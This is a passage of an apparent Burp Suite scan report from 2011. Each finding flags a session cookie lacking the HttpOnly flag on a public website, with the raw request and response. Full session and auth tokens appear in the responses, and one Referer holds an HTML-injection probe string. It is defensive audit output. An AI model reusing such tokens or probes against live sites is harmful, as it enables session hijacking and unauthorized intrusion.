Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:34 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=0feb3e2c1484ef81e4f5902f9eda5c12; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com
Last-Modified: Sun, 30 Jan 2011 01:51:21 GMT
ETag: "f0b5f444b53d8d069d3f3c230e6ce5fd"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

17.48. http://www.kanoodle.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://burp/show/43
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:25 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:25 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999<
...[SNIP]...

17.49. http://www.kanoodle.com/ajax/search_spy_data.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /ajax/search_spy_data.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/search_spy_data.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 529

&title=Top+Searches+-+Recent,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#0
...[SNIP]...

17.50. http://www.kanoodle.com/ajax/search_spy_data_today.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /ajax/search_spy_data_today.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/search_spy_data_today.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data_today.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 765

&title=Top+Searches+-+History,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#
...[SNIP]...

17.51. http://www.kanoodle.com/search_spy.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kanoodle.com
Path:   /search_spy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search_spy.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:31 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:31 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999<
...[SNIP]...

17.52. http://www.linkedin.com/cws/share-count

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /cws/share-count

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cws/share-count?url=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:8523036383389754514"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8FX-AizfuLs_YwcHoZSvLUTR1AIZyDsYg1FmX3RAtkskBYeHYyd-1Z:1296398887:819be2dfbd9e083133f7ab8f52acc0fa6efb40e0"; Version=1; Max-Age=1799; Expires=Sun, 30-Jan-2011 15:18:06 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Sun, 30 Jan 2011 14:48:07 GMT
Content-Length: 137

IN.Tags.Share.handleCount({"count":33,"url":"http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual"});

17.53. http://www.msdn.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.msdn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.msdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 15:48:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Location: http://msdn.microsoft.com
Content-Length: 23
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQCAARBS=HDGLAPLCFCHLAHILNAHKNFDH; path=/
Cache-control: private

<!--TOOLBAR_EXEMPT-->

17.54. https://www.msnfeedback.com/perseus/se.ashx

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.msnfeedback.com
Path:   /perseus/se.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /perseus/se.ashx HTTP/1.1
Host: www.msnfeedback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 30 Jan 2011 01:58:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /perseus/se.htm
Set-Cookie: ASP.NET_SessionId=so3zhbfsyas5riuwao00fhn1; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 132

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/perseus/se.htm'>here</a>.</h2>
</body></html>

17.55. http://www.opensource.org/licenses/gpl-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:00:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5tn15kgku9ganumk32p2galds1; expires=Tue, 22-Feb-2011 05:34:18 GMT; path=/; domain=.opensource.org
Last-Modified: Sun, 30 Jan 2011 01:50:28 GMT
ETag: "cccc2ce42797085e2ccf82df13a9cd5b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

17.56. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:55 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6th723c18tdksfb5ri6bpq7kv1; expires=Tue, 22-Feb-2011 02:57:15 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 29 Jan 2011 23:16:07 GMT
ETag: "1126140718825d2e8a4072da2e624330"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

17.57. http://www.popsci.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.popsci.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:18:22 GMT
Server: Apache
Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com
Last-Modified: Sun, 30 Jan 2011 03:17:46 GMT
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding,User-Agent
X-Server-Name: web4b D=17304
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-
...[SNIP]...

17.58. http://www.sciencenews.org/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sciencenews.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sciencenews.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6bcr7p0ka1rpr4bsk02joad525; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="head">

<!-- Meta -->

<meta http-equiv="Content-Type"
...[SNIP]...

17.59. http://www.scientificamerican.com/blog/observations/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scientificamerican.com
Path:   /blog/observations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211547;path=/
Set-Cookie: CFTOKEN=84610132;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70039
Date: Sat, 29 Jan 2011 22:32:21 GMT
X-Varnish: 461255158
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...

17.60. http://www.scientificamerican.com/errors/404.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scientificamerican.com
Path:   /errors/404.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /errors/404.cfm HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 404 Page not found
Server: Apache
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 57499
Date: Sun, 30 Jan 2011 17:14:49 GMT
X-Varnish: 1916371499
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html>
<html lang="en">
<head>
   <!--[if IE]><![endif]-->
   <title>Page not found--/errors/404.cfm? : Scientific American</title>
   <meta charset="utf-8" />
   <meta name="description" conte
...[SNIP]...

17.61. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Content-Length: 100748
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 01:24:06 GMT
Connection: close
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; path=/
Set-Cookie: SRVR=WEBX10%2D08A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=; path=/
Set-Cookie: SessionId=2683290720110129202406173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com

<!--V2-->
<!-- Your IP is:96.17.168.193-->

<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, ne
...[SNIP]...

17.62. http://www.unica.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.unica.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.unica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:03:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSESSIONID=6CBE4A3A1D183B08A17C13A27DDBEAE2.ds1; Path=/
Set-Cookie: RedDotLiveServerSessionID_unica_corporate_2009=SID-51125F36-8F1B4ED4; Path=/
Date: Sun, 30 Jan 2011 02:03:21 GMT
Expires: Sun, 30 Jan 2011 02:03:21 GMT
lsrequestid: 44298918
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 1 - published by
...[SNIP]...

17.63. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.walmart.com
Path:   /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Sun, 30 Jan 2011 02:03:54 GMT
Expires: Sun, 30 Jan 2011 02:03:54 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 02:03:54 GMT
Content-Length: 12096
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12965524989; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=129655249891685177; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:129655249891685177|:|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005d1b5c98a3fee429a173ace0a3fdb68dfdf66d4a6_1296353034111_SSL207_10-15-140-49_1296353034111_11.1_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1296353034113@firstcreate:1296353034113"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907962045525d5f4f58455e445a4a423660;path=/
Set-Cookie: SSLB=0; path=/; domain=.walmart.com
Via: HTTP/1.1 ew29 (ew29_7330869248_34521600)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ
...[SNIP]...

17.64. http://www.zacks.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zacks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:12 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=6ssok6pvga1gucejl91shelqj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
